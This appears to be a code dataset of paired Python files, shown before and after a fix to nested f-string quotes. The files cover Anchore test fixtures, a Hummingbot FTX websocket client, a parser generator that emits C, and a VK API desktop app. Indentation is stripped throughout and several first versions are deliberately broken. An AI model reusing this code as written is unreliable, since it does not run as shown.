image_id = analysis_document["document"][0]["image"]["imageId"]
try:
policy_engine_api.users.delete_image(image_id)
except http_utils.RequestFailedError as err:
if err.status_code != 404:
raise err
IMAGE_DIGEST_ID_MAP[analysis_file.image_digest] = image_id
def remove_documents_and_image() -> None:
"""
Cleanup, deletes added images and analyzer manifests.
"""
for analysis_file in ANALYSIS_FILES:
catalog_api.objects.delete_document(
"analysis_data", analysis_file.image_digest
)
policy_engine_api.users.delete_image(
IMAGE_DIGEST_ID_MAP[analysis_file.image_digest]
)
request.addfinalizer(remove_documents_and_image)
@pytest.fixture(scope="package")
def ingress_image(add_catalog_documents) -> Callable[[str], http_utils.APIResponse]:
"""
Returns method that adds new image to policy engine for vulnerability scanning. Moved to fixture to reduce code duplication.
:return: METHOD that calls ingress_image for the policy engine API with the appropriate catalog URL
:rtype: Callable[[str], http_utils.APIResponse]
"""
def _ingress_image(image_digest: str) -> http_utils.APIResponse:
"""
Adds new image to policy engine for vulnerability scanning. Moved to fixture to reduce code duplication.
:param image_digest: image digest of image to ingress
:type image_digest: str
:return: api response
:rtype: http_utils.APIResponse
"""
fetch_url = f"catalog://{http_utils.DEFAULT_API_CONF['ANCHORE_API_ACCOUNT']}/analysis_data/{image_digest}"
image_id = IMAGE_DIGEST_ID_MAP[image_digest]
return policy_engine_api.images.ingress_image(fetch_url, image_id)
return _ingress_image
@pytest.fixture(scope="package")
def ingress_all_images(ingress_image) -> None:
"""
Ingress all test images.
"""
for analysis_file in ANALYSIS_FILES:
ingress_image(analysis_file.image_digest)
@pytest.fixture(scope="session")
def image_digest_id_map() -> Dict[str, str]:
"""
:return: lookup mapping of image_digest to image_id
:rtype: Dict[str, str]
"""
return IMAGE_DIGEST_ID_MAP
SEED_FILE_TO_DB_TABLE_MAP: Dict[str, Callable] = {
"feed_data_vulnerabilities.json": Vulnerability,
"feed_data_vulnerabilities_fixed_artifacts.json": FixedArtifact,
"feed_data_nvdv2_vulnerabilities.json": NvdV2Metadata,
"feed_data_cpev2_vulnerabilities.json": CpeV2Vulnerability,
"feeds.json": FeedMetadata,
"catalog_image.json": CatalogImage,
"catalog_image_docker.json": CatalogImageDocker,
}
CATALOG_FILES = ["catalog_image.json", "catalog_image_docker.json"]
VULN_DATA_FILES = [
"feed_data_vulnerabilities.json",
"feed_data_vulnerabilities_fixed_artifacts.json",
"feed_data_nvdv2_vulnerabilities.json",
"feed_data_cpev2_vulnerabilities.json",
"feeds.json",
]
SEED_FILE_TO_METADATA_MAP: Dict[str, str] = {
"feed_data_vulnerabilities.json": "metadata_json",
"feed_data_vulnerabilities_fixed_artifacts.json": "fix_metadata",
}
def load_seed_file_rows(file_name: str) -> Generator[Dict, None, None]:
"""
Loads database seed files (json lines) and yields the json objects.
:param file_name: name of seed file to load
:type file_name: str
:return: generator yields json
:rtype: Generator[Dict, None, None]
"""
json_file = os.path.join(SEED_FILE_DIR, file_name)
with open(json_file, "rb") as f:
for line in f:
linetext = line.decode("unicode_escape").strip()
json_content = json.loads(linetext)
if file_name in SEED_FILE_TO_METADATA_MAP:
json_key = SEED_FILE_TO_METADATA_MAP[file_name]
if json_content[json_key] is not None:
json_content[json_key] = json.loads(json_content[json_key])
yield json_content
def _setup_vuln_data():
"""
Loads database seed files and bulk saves all records direclty to db
"""
with session_scope() as db:
all_records = []
files_to_seed = CATALOG_FILES.copy()
# If legacy provider, add vuln data to be seeded to files
# if grype provider, ensure the grypedb is synced
if is_legacy_provider():
files_to_seed += VULN_DATA_FILES
else:
policy_engine_api.feeds.feeds_sync(force_flush=True)
# seed data to engine db
for seed_file_name in files_to_seed:
entry_cls = SEED_FILE_TO_DB_TABLE_MAP[seed_file_name]
for db_entry in load_seed_file_rows(seed_file_name):
all_records.append(entry_cls(**db_entry))
db.bulk_save_objects(all_records)
db.flush()
@pytest.fixture(scope="package", autouse=True)
def setup_vuln_data(
request, set_env_vars, anchore_db, teardown_and_recreate_tables
) -> None:
"""
Writes database seed file content to database. This allows us to ensure consistent vulnerability results (regardless of feed sync status).
"""
tablenames = [cls.__tablename__ for cls in SEED_FILE_TO_DB_TABLE_MAP.values()]
tablenames.extend(
[CachedPolicyEvaluation.__tablename__, ImageVulnerabilitiesReport.__tablename__]
)
teardown_and_recreate_tables(tablenames)
_setup_vuln_data()
request.addfinalizer(lambda: teardown_and_recreate_tables(tablenames))
|
import asyncio
from decimal import Decimal
import logging
import time
from typing import (
AsyncIterable,
Dict,
Optional
)
import json
import simplejson
import websockets
from hummingbot.core.data_type.user_stream_tracker_data_source import UserStreamTrackerDataSource
from hummingbot.logger import HummingbotLogger
from hummingbot.connector.exchange.ftx.ftx_auth import FtxAuth
FTX_API_ENDPOINT = "wss://ftx.com/ws/"
FTX_USER_STREAM_ENDPOINT = "userDataStream"
class FtxAPIUserStreamDataSource(UserStreamTrackerDataSource):
MESSAGE_TIMEOUT = 30.0
PING_TIMEOUT = 10.0
_bausds_logger: Optional[HummingbotLogger] = None
@classmethod
def logger(cls) -> HummingbotLogger:
if cls._bausds_logger is None:
cls._bausds_logger = logging.getLogger(__name__)
return cls._bausds_logger
def __init__(self, ftx_auth: FtxAuth):
super().__init__()
self._listen_for_user_stream_task = None
self._ftx_auth: FtxAuth = ftx_auth
self._last_recv_time: float = 0
@property
def last_recv_time(self) -> float:
return self._last_recv_time
async def set_subscriptions(self, ws: websockets.WebSocketClientProtocol):
await ws.send(json.dumps(self._ftx_auth.generate_websocket_subscription()))
await ws.send(json.dumps({"op": "subscribe", "channel": "orders"}))
await ws.send(json.dumps({"op": "subscribe", "channel": "fills"}))
async def listen_for_user_stream(self, ev_loop: asyncio.BaseEventLoop, output: asyncio.Queue):
while True:
try:
ws = await self.get_ws_connection()
await self.set_subscriptions(ws)
async for message in self._inner_messages(ws):
decoded: Dict[str, any] = simplejson.loads(message, parse_float=Decimal)
if decoded['type'] == 'error':
self.logger().warning(f"Error returned from ftx user stream: {decoded["code"]}:{decoded["msg"]}")
output.put_nowait(decoded)
except asyncio.CancelledError:
raise
except asyncio.TimeoutError:
self.logger().warning("WebSocket ping timed out. Reconnecting after 5 seconds...")
except Exception:
self.logger().error("Unexpected error while maintaining the user event listen key. Retrying after "
"5 seconds...", exc_info=True)
finally:
await ws.close()
await asyncio.sleep(5)
async def _inner_messages(self, ws) -> AsyncIterable[str]:
# Terminate the recv() loop as soon as the next message timed out, so the outer loop can reconnect.
while True:
try:
msg: str = await asyncio.wait_for(ws.recv(), timeout=self.MESSAGE_TIMEOUT)
self._last_recv_time = time.time()
yield msg
except asyncio.TimeoutError:
pong_waiter = await ws.ping()
await asyncio.wait_for(pong_waiter, timeout=self.PING_TIMEOUT)
self._last_recv_time = time.time()
def get_ws_connection(self):
stream_url: str = f"{FTX_API_ENDPOINT}"
return websockets.connect(stream_url)
| import asyncio
from decimal import Decimal
import logging
import time
from typing import (
AsyncIterable,
Dict,
Optional
)
import json
import simplejson
import websockets
from hummingbot.core.data_type.user_stream_tracker_data_source import UserStreamTrackerDataSource
from hummingbot.logger import HummingbotLogger
from hummingbot.connector.exchange.ftx.ftx_auth import FtxAuth
FTX_API_ENDPOINT = "wss://ftx.com/ws/"
FTX_USER_STREAM_ENDPOINT = "userDataStream"
class FtxAPIUserStreamDataSource(UserStreamTrackerDataSource):
MESSAGE_TIMEOUT = 30.0
PING_TIMEOUT = 10.0
_bausds_logger: Optional[HummingbotLogger] = None
@classmethod
def logger(cls) -> HummingbotLogger:
if cls._bausds_logger is None:
cls._bausds_logger = logging.getLogger(__name__)
return cls._bausds_logger
def __init__(self, ftx_auth: FtxAuth):
super().__init__()
self._listen_for_user_stream_task = None
self._ftx_auth: FtxAuth = ftx_auth
self._last_recv_time: float = 0
@property
def last_recv_time(self) -> float:
return self._last_recv_time
async def set_subscriptions(self, ws: websockets.WebSocketClientProtocol):
await ws.send(json.dumps(self._ftx_auth.generate_websocket_subscription()))
await ws.send(json.dumps({"op": "subscribe", "channel": "orders"}))
await ws.send(json.dumps({"op": "subscribe", "channel": "fills"}))
async def listen_for_user_stream(self, ev_loop: asyncio.BaseEventLoop, output: asyncio.Queue):
while True:
try:
ws = await self.get_ws_connection()
await self.set_subscriptions(ws)
async for message in self._inner_messages(ws):
decoded: Dict[str, any] = simplejson.loads(message, parse_float=Decimal)
if decoded['type'] == 'error':
self.logger().warning(f"Error returned from ftx user stream: {decoded['code']}:{decoded['msg']}")
output.put_nowait(decoded)
except asyncio.CancelledError:
raise
except asyncio.TimeoutError:
self.logger().warning("WebSocket ping timed out. Reconnecting after 5 seconds...")
except Exception:
self.logger().error("Unexpected error while maintaining the user event listen key. Retrying after "
"5 seconds...", exc_info=True)
finally:
await ws.close()
await asyncio.sleep(5)
async def _inner_messages(self, ws) -> AsyncIterable[str]:
# Terminate the recv() loop as soon as the next message timed out, so the outer loop can reconnect.
while True:
try:
msg: str = await asyncio.wait_for(ws.recv(), timeout=self.MESSAGE_TIMEOUT)
self._last_recv_time = time.time()
yield msg
except asyncio.TimeoutError:
pong_waiter = await ws.ping()
await asyncio.wait_for(pong_waiter, timeout=self.PING_TIMEOUT)
self._last_recv_time = time.time()
def get_ws_connection(self):
stream_url: str = f"{FTX_API_ENDPOINT}"
return websockets.connect(stream_url)
|
import sys
import io
class Calcifier:
def __init__(self):
self.root = "root"
self.lang = "calcifier_calc"
self.rules = {}
self.rules_by_priority = {}
self.node_type = ""
def priorities(self):
return self.rules_by_priority.keys()
@staticmethod
def crange(_from: str, _to: str) -> str:
return set(map(chr, range(ord(_from), ord(_to) + 1)))
def load(self, file: io.TextIOWrapper) -> bool:
self.__init__()
if not file.readable():
return False
for src in file.read().splitlines():
if src == None:
break
src = list(filter(len, map(str.strip, src.split(" "))))
if len(src) == 0 or src[0] == '#':
continue
if len(src) == 1 and src[0] == "end":
break
if self.load_lang(src):
continue
if self.load_type(src):
continue
if self.load_root(src):
continue
if self.load_rule(src):
continue
print(f'#error "{src}"')
return False
if self.node_type == "":
self.node_type = self.lang + "_node_t"
return True
def load_root(self, src: list) -> bool:
if len(src) == 2 and src[0] == "root":
self.root = src[1]
return True
return False
def load_lang(self, src: list) -> bool:
if len(src) == 2 and src[0] == "lang":
self.lang = src[1]
return True
return False
def load_type(self, src: list) -> bool:
if len(src) == 2 and src[0] == "type":
self.node_type = src[1]
return True
return False
# bug: maybe this function has any well-known name
@staticmethod
def zigzag(lst: list, unit: int) -> list:
r = []
u = []
for i in lst:
u += [i]
if len(u) >= unit:
r += [u]
u = []
return r
def load_rule(self, src: list) -> bool:
header = 7
if not (len(src) >= header + 2
and src[0] == "rule"
and (len(src) - header) % 2 == 0):
return False
base_rule = {
'priority': src[1],
'order': src[2],
'argc': int(src[3]),
'left': src[4],
'right': src[5],
'next': src[6]
}
if base_rule['priority'] not in self.priorities():
self.rules_by_priority[base_rule['priority']] = []
for c, f in self.zigzag(src[header:], 2):
rule = base_rule.copy()
rule.update({
'key': c,
'function': f
})
self.rules[rule['key']] = rule
self.rules_by_priority[rule['priority']] += [rule]
return True
def dump(self, file: io.TextIOWrapper):
file.writelines([
f'lang {self.lang}\n',
f'type {self.node_type}\n',
f'root {self.root}\n'
])
for key in self.priorities():
rules = self.rules_by_priority[key]
r = rules[0]
file.write(f'rule {key}' +
f' {r['order']} {r['argc']}' +
f' {r['left']} {r['right']} {r['next']}')
for rule in rules:
file.write(f' {rule['key']} {rule['function']}')
file.write("\n")
def is_then(self, rule):
return rule['function'] in [ "if", "then", "pyif" ]
def is_do(self, rule):
return rule["function"] == "do"
def is_while(self, rule):
return rule["function"] == "while"
def generate(self, file: io.TextIOWrapper) -> bool:
if not file.writable():
return False
if self.root not in self.priorities():
return False
self.generate_header(file)
for key in self.priorities():
self.generate_func(file, key)
return True
def generate_header(self, file: io.TextIOWrapper):
file.write(f"""
#include "calcifier_rtl.h"
#include "{self.lang}.h"
typedef {self.node_type} node_t;
""")
for key in self.priorities():
rules = self.rules_by_priority[key]
file.write("static " + self.func_header(rules[0]) + ";\n")
file.write(f"""
bool {self.lang}_tryParse(char *s, ptrdiff_t len, node_t *out_value) {{
return tryParse_{self.root}(s, len, out_value);
}}
""")
file.write(f"""
static bool tryParse_n(char *s, ptrdiff_t len, node_t *out_value) {{
if (s == NULL || !*s || len == 0
|| !tryTrim(s, len, &s, &len)
|| len == 0)
return false;
return {self.lang}_tryParseValue(s, len, out_value);
}}
""")
def func_name(self, rule) -> str:
return f'tryParse_{rule['priority']}'
def func_header(self, rule) -> str:
head = ""
if self.is_then(rule):
t = "Elseable"
return (f'bool {self.func_name(rule)}' +
f'(char *s, ptrdiff_t len, node_t *out_value)')
def generate_nodefuncs(self, file: io.TextIOWrapper):
for r in self.rules:
file.write(f'extern node_t {self.lang}_{r['key']}_{r['argc']}(')
for i in range(r["argc"]):
if i > 0:
file.write(", ")
file.write("node_t")
file.write(");\n")
@staticmethod
def escape_char(c):
if ord(c) in range(33, 127) and c not in "\\\"\'":
return c
else:
return "\\x{:02x}".format(ord(c))
def escape_str(self, s):
return "".join(list(map(self.escape_char, s)))
def rules_to_keys(self, rules: list) -> str:
def f(rule):
return self.escape_char(rule["key"])
return "".join(list(map(f, rules)))
def generate_func(self, file: io.TextIOWrapper, priority: str) -> bool:
rules = self.rules_by_priority[priority]
rule = rules[0]
skip = f'{self.lang}_skip{rule['order']}'
if rule["next"] == priority:
return False
if rule["left"] == priority and rule["right"] == priority:
return False
if rule["left"] == priority and rule["order"] == "l":
return False
if rule["right"] == priority and rule["order"] == "r":
return False
if rule["argc"] not in range(1, 3):
return False
file.write(f"""
{self.func_header(rule)} {{
char *s2;
ptrdiff_t len2;
if (s == NULL || !*s || len == 0
|| !tryTrim(s, len, &s2, &len2)
|| len2 == 0)
return false;
""")
if rule["argc"] == 1:
if rule["left"] != "-" and rule["right"] != "-":
return False
if rule["order"] == "l":
idx = "0"
next_idx = "s2 + 1"
else:
idx = "len2 - 1"
next_idx = "s2"
if rule["left"] != "-":
child = "left"
else:
child = "right"
file.write(f"""
if (strchr("{self.rules_to_keys(rules)}", s2[{idx}])
&& tryParse_{rule[child]}({next_idx}, len2 - 1, out_value))
{{
if (out_value) {{
""")
for r in rules:
file.write(f"""if (s2[{idx}] == '{r["key"]}')
*out_value = {self.lang}_newnode_{r["function"]}_1(*out_value, {self.lang}_nilnode());
else """)
file.write(f"""{{
{self.lang}_delnode(*out_value);
*out_value = {self.lang}_nilnode();
}}
}}
return true;
}}
return """)
if rule["next"] == "-":
file.write("false")
else:
file.write(f"""tryParse_{rule["next"]}(s2, len2, out_value)""")
file.write(""";
}""")
return True
if rule["argc"] != 2:
return False
if rule["left"] == "-" or rule["right"] == "-":
return False
# any binary operators
file.write(f"""
node_t left = {self.lang}_nilnode(), right = {self.lang}_nilnode();
""")
if rule["order"] == "l":
file.write(f"""
for (ptrdiff_t opr = 0; opr < len2; opr = {skip}(s2, len2, opr)) {{""")
else:
file.write(f"""
for (ptrdiff_t opr = len2; (opr = {skip}(s2, len2, opr)) > 0;) {{""")
file.write(f"""
left = {self.lang}_delnode(left);
right = {self.lang}_delnode(right);
if (!strchr("{self.rules_to_keys(rules)}", s2[opr])) continue;
char *right_p = s2 + opr + 1;
ptrdiff_t right_len = len2 - opr - 1;
if (tryParse_{rule["left"]}(s2, opr, &left)
&& tryParse_{rule["right"]}(right_p, right_len, &right))
{{
if (out_value) {{
""")
for r in rules:
file.write(f"""if (s2[opr] == '{r["key"]}')
*out_value = {self.lang}_newnode_{r["function"]}_2(left, right);
else """)
file.write(f"""{{
*out_value = left;
{self.lang}_delnode(right);
}}
}}
return true;
}}
}}
return """)
if rule["next"] == "-":
file.write('false')
else:
file.write(f'tryParse_{rule['next']}(s2, len2, out_value)')
file.write(""";
}
""")
return True
calcifier = Calcifier()
calcifier.load(sys.stdin)
print("/*")
calcifier.dump(sys.stdout)
print("*/")
calcifier.generate(sys.stdout)
| import sys
import io
class Calcifier:
def __init__(self):
self.root = "root"
self.lang = "calcifier_calc"
self.rules = {}
self.rules_by_priority = {}
self.node_type = ""
def priorities(self):
return self.rules_by_priority.keys()
@staticmethod
def crange(_from: str, _to: str) -> str:
return set(map(chr, range(ord(_from), ord(_to) + 1)))
def load(self, file: io.TextIOWrapper) -> bool:
self.__init__()
if not file.readable():
return False
for src in file.read().splitlines():
if src == None:
break
src = list(filter(len, map(str.strip, src.split(" "))))
if len(src) == 0 or src[0] == '#':
continue
if len(src) == 1 and src[0] == "end":
break
if self.load_lang(src):
continue
if self.load_type(src):
continue
if self.load_root(src):
continue
if self.load_rule(src):
continue
print(f'#error "{src}"')
return False
if self.node_type == "":
self.node_type = self.lang + "_node_t"
return True
def load_root(self, src: list) -> bool:
if len(src) == 2 and src[0] == "root":
self.root = src[1]
return True
return False
def load_lang(self, src: list) -> bool:
if len(src) == 2 and src[0] == "lang":
self.lang = src[1]
return True
return False
def load_type(self, src: list) -> bool:
if len(src) == 2 and src[0] == "type":
self.node_type = src[1]
return True
return False
# bug: maybe this function has any well-known name
@staticmethod
def zigzag(lst: list, unit: int) -> list:
r = []
u = []
for i in lst:
u += [i]
if len(u) >= unit:
r += [u]
u = []
return r
def load_rule(self, src: list) -> bool:
header = 7
if not (len(src) >= header + 2
and src[0] == "rule"
and (len(src) - header) % 2 == 0):
return False
base_rule = {
'priority': src[1],
'order': src[2],
'argc': int(src[3]),
'left': src[4],
'right': src[5],
'next': src[6]
}
if base_rule['priority'] not in self.priorities():
self.rules_by_priority[base_rule['priority']] = []
for c, f in self.zigzag(src[header:], 2):
rule = base_rule.copy()
rule.update({
'key': c,
'function': f
})
self.rules[rule['key']] = rule
self.rules_by_priority[rule['priority']] += [rule]
return True
def dump(self, file: io.TextIOWrapper):
file.writelines([
f'lang {self.lang}\n',
f'type {self.node_type}\n',
f'root {self.root}\n'
])
for key in self.priorities():
rules = self.rules_by_priority[key]
r = rules[0]
file.write(f'rule {key}' +
f' {r["order"]} {r["argc"]}' +
f' {r["left"]} {r["right"]} {r["next"]}')
for rule in rules:
file.write(f' {rule["key"]} {rule["function"]}')
file.write("\n")
def is_then(self, rule):
return rule['function'] in [ "if", "then", "pyif" ]
def is_do(self, rule):
return rule["function"] == "do"
def is_while(self, rule):
return rule["function"] == "while"
def generate(self, file: io.TextIOWrapper) -> bool:
if not file.writable():
return False
if self.root not in self.priorities():
return False
self.generate_header(file)
for key in self.priorities():
self.generate_func(file, key)
return True
def generate_header(self, file: io.TextIOWrapper):
file.write(f"""
#include "calcifier_rtl.h"
#include "{self.lang}.h"
typedef {self.node_type} node_t;
""")
for key in self.priorities():
rules = self.rules_by_priority[key]
file.write("static " + self.func_header(rules[0]) + ";\n")
file.write(f"""
bool {self.lang}_tryParse(char *s, ptrdiff_t len, node_t *out_value) {{
return tryParse_{self.root}(s, len, out_value);
}}
""")
file.write(f"""
static bool tryParse_n(char *s, ptrdiff_t len, node_t *out_value) {{
if (s == NULL || !*s || len == 0
|| !tryTrim(s, len, &s, &len)
|| len == 0)
return false;
return {self.lang}_tryParseValue(s, len, out_value);
}}
""")
def func_name(self, rule) -> str:
return f'tryParse_{rule["priority"]}'
def func_header(self, rule) -> str:
head = ""
if self.is_then(rule):
t = "Elseable"
return (f'bool {self.func_name(rule)}' +
f'(char *s, ptrdiff_t len, node_t *out_value)')
def generate_nodefuncs(self, file: io.TextIOWrapper):
for r in self.rules:
file.write(f'extern node_t {self.lang}_{r["key"]}_{r["argc"]}(')
for i in range(r["argc"]):
if i > 0:
file.write(", ")
file.write("node_t")
file.write(");\n")
@staticmethod
def escape_char(c):
if ord(c) in range(33, 127) and c not in "\\\"\'":
return c
else:
return "\\x{:02x}".format(ord(c))
def escape_str(self, s):
return "".join(list(map(self.escape_char, s)))
def rules_to_keys(self, rules: list) -> str:
def f(rule):
return self.escape_char(rule["key"])
return "".join(list(map(f, rules)))
def generate_func(self, file: io.TextIOWrapper, priority: str) -> bool:
rules = self.rules_by_priority[priority]
rule = rules[0]
skip = f'{self.lang}_skip{rule["order"]}'
if rule["next"] == priority:
return False
if rule["left"] == priority and rule["right"] == priority:
return False
if rule["left"] == priority and rule["order"] == "l":
return False
if rule["right"] == priority and rule["order"] == "r":
return False
if rule["argc"] not in range(1, 3):
return False
file.write(f"""
{self.func_header(rule)} {{
char *s2;
ptrdiff_t len2;
if (s == NULL || !*s || len == 0
|| !tryTrim(s, len, &s2, &len2)
|| len2 == 0)
return false;
""")
if rule["argc"] == 1:
if rule["left"] != "-" and rule["right"] != "-":
return False
if rule["order"] == "l":
idx = "0"
next_idx = "s2 + 1"
else:
idx = "len2 - 1"
next_idx = "s2"
if rule["left"] != "-":
child = "left"
else:
child = "right"
file.write(f"""
if (strchr("{self.rules_to_keys(rules)}", s2[{idx}])
&& tryParse_{rule[child]}({next_idx}, len2 - 1, out_value))
{{
if (out_value) {{
""")
for r in rules:
file.write(f"""if (s2[{idx}] == '{r["key"]}')
*out_value = {self.lang}_newnode_{r["function"]}_1(*out_value, {self.lang}_nilnode());
else """)
file.write(f"""{{
{self.lang}_delnode(*out_value);
*out_value = {self.lang}_nilnode();
}}
}}
return true;
}}
return """)
if rule["next"] == "-":
file.write("false")
else:
file.write(f"""tryParse_{rule["next"]}(s2, len2, out_value)""")
file.write(""";
}""")
return True
if rule["argc"] != 2:
return False
if rule["left"] == "-" or rule["right"] == "-":
return False
# any binary operators
file.write(f"""
node_t left = {self.lang}_nilnode(), right = {self.lang}_nilnode();
""")
if rule["order"] == "l":
file.write(f"""
for (ptrdiff_t opr = 0; opr < len2; opr = {skip}(s2, len2, opr)) {{""")
else:
file.write(f"""
for (ptrdiff_t opr = len2; (opr = {skip}(s2, len2, opr)) > 0;) {{""")
file.write(f"""
left = {self.lang}_delnode(left);
right = {self.lang}_delnode(right);
if (!strchr("{self.rules_to_keys(rules)}", s2[opr])) continue;
char *right_p = s2 + opr + 1;
ptrdiff_t right_len = len2 - opr - 1;
if (tryParse_{rule["left"]}(s2, opr, &left)
&& tryParse_{rule["right"]}(right_p, right_len, &right))
{{
if (out_value) {{
""")
for r in rules:
file.write(f"""if (s2[opr] == '{r["key"]}')
*out_value = {self.lang}_newnode_{r["function"]}_2(left, right);
else """)
file.write(f"""{{
*out_value = left;
{self.lang}_delnode(right);
}}
}}
return true;
}}
}}
return """)
if rule["next"] == "-":
file.write('false')
else:
file.write(f'tryParse_{rule["next"]}(s2, len2, out_value)')
file.write(""";
}
""")
return True
calcifier = Calcifier()
calcifier.load(sys.stdin)
print("/*")
calcifier.dump(sys.stdout)
print("*/")
calcifier.generate(sys.stdout)
|
import gc
import os
import time
import tracemalloc
from math import ceil
from shutil import rmtree
from sys import exit as exit_ex
from sys import platform
from time import time as time_now
from tkinter import Label, Tk
from tkinter.messagebox import showerror, showinfo, showwarning
from typing import Union
from webbrowser import open_new_tab as web_open_new_tab
import requests
import vk_api
from _tkinter import TclError
from apscheduler.schedulers.background import BackgroundScheduler
from PIL import Image, ImageTk
from base_data import GetRequestsToDB, MainDB, UpdateRequestsToDB
from settings import (DEFAULT_VALUE_FOR_BD, HTTP_FOR_REQUESTS, HTTP_GET_TOKEN,
ID_GROUP_VK, INFO_MSG, LOGGER, REPO_BRANCH_MASTER,
REPO_BRANCH_UPDATER, REPO_BRANCH_VERSION,
TIME_FREE_VERSION, VERSION_API, WARNING_MSG, path,
path_to_dir_ico)
from windows import AdditionalWindows
if platform in ['linux']:
OS = 'Linux'
elif platform in ['win32', 'cygwin']:
OS = 'Windows'
else:
showerror(
'Платформа не поддерживается',
f'Неподдерживаемая платформа: {platform}\n\nОбратитесь за помощью '
'к боту VK'
)
exit_ex()
class BrainForApp:
"""
Класс отвечающий за настройку и запуск приложения
"""
def __init__(self, window_preview):
"""
Создаёт превью и проверяет нужные настройки для программы, а также
запускает её
:param window_preview: объект окна превью
"""
self.logger = LOGGER('main', 'main')
png_preview_open, png_preview = self.preview_image_open()
self.preview_image_set(png_preview_open, png_preview, window_preview)
window_preview.update()
tracemalloc.start()
time.sleep(2)
MainDB()
get_requests_db = GetRequestsToDB()
settings = get_requests_db.get_records(
tb_name=get_requests_db.settings, one_record=True,
select=['first_start', 'auto_update']
)
first_start = settings['first_start']
auto_update = settings['auto_update']
if first_start == 1:
self.logger.info('Первый запуск')
window_preview.destroy()
done = AdditionalWindows().person_and_agreement_data()
if done is True:
update_requests_db = UpdateRequestsToDB()
update_requests_db.update_table(
tb_name=update_requests_db.settings,
update_row={'first_start': 0}
)
self.logger.warning('Очистка от лишних файлов в директории')
list_path = os.listdir(path)
if REPO_BRANCH_UPDATER in list_path:
rmtree(REPO_BRANCH_UPDATER, ignore_errors=True, onerror=None)
if REPO_BRANCH_VERSION in list_path:
rmtree(REPO_BRANCH_VERSION, ignore_errors=True, onerror=None)
if REPO_BRANCH_MASTER in list_path:
rmtree(REPO_BRANCH_MASTER, ignore_errors=True, onerror=None)
try:
self.logger.warning('Закрытие окна первью')
window_preview.destroy()
except TclError:
pass
del settings, first_start, list_path, window_preview
gc.collect()
self.logger.info('Создание задачи scheduler')
scheduler = BackgroundScheduler()
scheduler.start()
scheduler.add_job(__scheduler__, 'interval', minutes=1)
self.logger.info('Запуск приложения')
from windows import App
App(auto_update, OS)
self.logger.info('Закрытие приложения')
def preview_image_open(self):
"""
Возвращает первью картинку
"""
while True:
try:
png_preview_open = Image.open(
os.path.join(path_to_dir_ico, 'preview.png')
)
png_preview = ImageTk.PhotoImage(png_preview_open)
return png_preview_open, png_preview
except FileNotFoundError as err:
self.logger.error(str(err))
@staticmethod
def preview_image_set(png_preview_open, png_preview, window_preview):
"""
Устанавливает размеры окна, ставит его по середине, устанавливает
картинку как фон
"""
x_img, y_img = png_preview_open.size
x = (window_preview.winfo_screenwidth() - x_img) // 2
y = (window_preview.winfo_screenheight() - y_img) // 2
window_preview.geometry("%ix%i+%i+%i" % (x_img, y_img, x, y))
Label(window_preview, image=png_preview).pack(side='top')
class ConfigureVkApi:
"""
Класс отвечающий за нстройку инструментов для запросов к API Vk
"""
def __init__(self, ignore_existing_token: bool = False):
self.logger = LOGGER('config_vk_api', 'vk_api')
get_requests_db = GetRequestsToDB()
user_data_table_value = get_requests_db.get_records(
tb_name=get_requests_db.userdata, one_record=True,
select=['access_token']
)
token = user_data_table_value['access_token']
self.__additional_windows = AdditionalWindows
if ignore_existing_token is False:
if (token is None) or (token == DEFAULT_VALUE_FOR_BD):
token = self.get_token()
else:
token = self.get_token()
if (token is not None) or (token != DEFAULT_VALUE_FOR_BD):
is_donat = self.check_is_donat(token)
if is_donat is False:
token = None
self.token = token
if self.token is not None:
vk_session = vk_api.VkApi(token=self.token)
self.vk_tool = vk_api.tools.VkTools(vk_session)
if ignore_existing_token is True:
showinfo(
'Авторизовались',
'Вы удачно авторизовались!'
)
self.logger.info('Получен vk_tool и сам токен')
else:
self.logger.error('vk_tool не удалось получить')
self.vk_tool = None
del get_requests_db, user_data_table_value
def get_token(self) -> Union[str, None]:
"""
Функция получения токнеа пользователя
:return:
"""
showinfo('Получение токена!', INFO_MSG['VK_API']['get_token'])
web_open_new_tab(HTTP_GET_TOKEN)
token = self.__additional_windows().get_token()
token = self.preparation_final_token(token)
if token == DEFAULT_VALUE_FOR_BD:
LOGGER.warning(
'При выполнении функции get_token был получен невалидный токен'
)
return None
params = {
'v': VERSION_API,
'access_token': token
}
try:
request = requests.get(
HTTP_FOR_REQUESTS.format(method='users.get'),
params=params
).json()
except ConnectionError:
showerror(
'Нет подключения',
'Не возиожно авторизоваться, нетп подключения к интернету'
)
return None
if request.get('error'):
showerror(
'Авторизация не удалась',
'Неверный токен авторизации, произошла ошибка, '
'повторите попытку'
)
return None
update_requests_db = UpdateRequestsToDB()
update_requests_db.update_table(
tb_name=update_requests_db.userdata,
update_row={'access_token': token}
)
del request
return token
@staticmethod
def check_is_donat(token: str) -> bool:
"""
Функция проверки оплаты подписки на программу пользователем
:param token: токен пользователя
:return:
"""
params = {
'v': VERSION_API,
'access_token': token,
'owner_id': ID_GROUP_VK
}
try:
request = requests.get(
HTTP_FOR_REQUESTS.format(method='donut.isDon'),
params=params
).json()
except ConnectionError:
showerror(
'Нет подключения',
'Невозможно авторизоваться, нет подключения к интернету'
)
return False
if request.get('error'):
showerror(
'Ошибка',
f'Произошла непредвиденная ошибка {request['error']}'
)
response = request.get('response')
if int(response) == 1:
return True
else:
get_requests_db = GetRequestsToDB()
__start = GetRequestsToDB().get_records(
select=['start_free_version'], one_record=True,
tb_name=get_requests_db.settings
)['start_free_version']
if __start is None:
warning = WARNING_MSG['VK_API']['is_not_donat_free']
showwarning(
'Пробная версия!',
warning.format(min=TIME_FREE_VERSION // 60)
)
start_free_version = time_now()
update_request_db = UpdateRequestsToDB()
update_request_db.update_table(
tb_name=update_request_db.settings,
update_row={'start_free_version': int(start_free_version)}
)
return True
else:
time_use_free_version = ceil(time_now()) - int(__start)
if time_use_free_version >= TIME_FREE_VERSION:
warning = WARNING_MSG['VK_API']['is_not_donat']
showwarning(
'Пробная версия!',
warning
)
return False
else:
time_left = TIME_FREE_VERSION - time_use_free_version
warning = WARNING_MSG['VK_API']['is_not_donat_free']
showwarning(
'Пробная версия!',
warning.format(min=time_left // 60)
)
return True
def preparation_final_token(self, token: str) -> str:
"""
Функция обработки ссылки и получения из неё токена
:param token: ссылка с токеном
:return:
"""
token = token.split('access_token=')
if len(token) == 2:
token = token[1].split('&')[0]
return token
showwarning(
'Не смог распознать токен',
WARNING_MSG['VK_API']['non_inspected_token']
)
self.logger.warning(
'При выполнении preparation_final_token, не смог распознать токен'
)
return DEFAULT_VALUE_FOR_BD
if __name__ == '__main__':
def __scheduler__() -> None:
"""
Функция отвечает за сброс мусора и ведение логгера с информацией об
этом
:return:
"""
scheduler_logger = LOGGER('scheduler', 'main')
